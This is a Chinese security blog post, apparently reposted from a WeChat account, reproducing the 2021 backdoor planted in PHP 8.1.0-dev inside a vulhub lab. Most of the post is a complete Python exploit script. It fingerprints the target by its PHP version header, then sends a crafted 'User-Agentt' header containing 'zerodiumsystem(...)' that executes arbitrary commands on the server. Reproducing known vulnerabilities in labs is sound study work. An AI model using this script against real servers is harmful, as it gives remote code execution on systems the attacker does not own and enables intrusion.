PHP 8.1.0-dev 开发版本后门复现

  • A+
所属分类:安全文章

0x00:简介


    PHP 8.1.0-dev 开发版本在2021年3月28日被植入后门,但是后门很快被发现并修正。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。


0x01:搭建环境


https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor


PHP 8.1.0-dev 开发版本后门复现

然后访问本地地址

http://127.0.0.1:8080/


PHP 8.1.0-dev 开发版本后门复现

0x02:漏洞复现


PHP 8.1.0-dev 开发版本后门复现

神秘代码

#!/usr/bin/env python3import requestsimport argparse
from requests.models import parse_header_links
s = requests.Session()
def checkTarget(args): r = s.get(args.url) for h in r.headers.items(): if "PHP/8.1.0-dev" in h[1]: return True return False

def execCmd(args): r = s.get(args.url, headers={"User-Agentt":"zerodiumsystem(""+args.cmd+"");"}) res = r.text.split("<!DOCTYPE html>")[0] if not res: print("[-] No Results") else: print("[+] Results:") print(res.strip())

def main():
parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="Target URL (Eg: http://127.0.0.1:8080/)", required=True) parser.add_argument("-c", "--cmd", help="Command to execute (Eg: ls,id,whoami)", default="id") args = parser.parse_args()
if checkTarget(args): execCmd(args) else: print("[!] Not Vulnerable or url error") exit(0) if __name__ == "__main__": main()
PHP 8.1.0-dev 开发版本后门复现

扫码二维码

获取更多精彩

洛米唯熊

PHP 8.1.0-dev 开发版本后门复现




点个在看 你最好看



PHP 8.1.0-dev 开发版本后门复现

本文始发于微信公众号(洛米唯熊):PHP 8.1.0-dev 开发版本后门复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: